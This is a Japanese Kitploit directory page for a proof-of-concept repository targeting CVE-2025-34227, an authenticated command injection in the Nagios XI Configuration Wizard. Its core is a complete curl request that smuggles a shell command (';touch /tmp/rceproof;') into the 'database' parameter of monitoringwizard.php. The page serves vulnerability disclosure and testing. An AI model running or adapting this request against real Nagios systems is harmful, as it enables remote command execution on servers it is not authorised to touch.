Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-34227_Nagios-XI-Command-Injection-Configuration-Wizard — シンプルな概念実証リポジトリ - CVE-2025-34227 Nagios XI Configuration Wizard における認証済みコマンドインジェクション | Kitploit
ツール/GitHubGitHub/mcorybillington/cve-2025-34227_nagios-xi-command-injection-configuration-wizard
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubmcorybillington/cve-2025-34227_nagios-xi-command-injection-configuration-wizard

CVE-2025-34227_Nagios-XI-Command-Injection-Configuration-Wizard

シンプルな概念実証リポジトリ - CVE-2025-34227 Nagios XI Configuration Wizard における認証済みコマンドインジェクション

リポジトリを見る
9ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-34227 Nagios XI Configuration Wizard における認証済みコマンドインジェクション

CVE-2025-34227 の簡単な概念実証リポジトリです。Nagios XI の Configuration Wizard における認証済みコマンドインジェクションです。

詳細な解説はこちら: https://theyhack.me/CVE-2025-34227-Nagios-XI-Wizard-Command-Injection/

curl 概念実証

以下のペイロードは database パラメータに含まれています: ;touch /tmp/rceproof;。

認証後、Cookie: nagiosxi= セッションID を追加し、nsp 値を POST ボディに追加してください:

root@kitploit:~
$ curl -s \
-H 'Cookie: nagiosxi=<your-session-id-here>' \
--data 'update=1&nsp=<your-nsp-value-here>&step=3&nextstep=5&wizard=mysqlquery&tpl=&hostname=localhost&operation=&selectedhostconfig=&services_serial=&serviceargs_serial=&config_serial=&ip_address=127.0.0.1&port=3306&username=test&password=test&database=information_schema%3Btouch+/tmp/rceproof%3B&queryname=curl+RCE+service&query=SELECT+1&warning=50&check_interval=1&retry_interval=1&critical=200&finishButton=' \
http://192.168.122.9/nagiosxi/config/monitoringwizard.php
ツールをダウンロード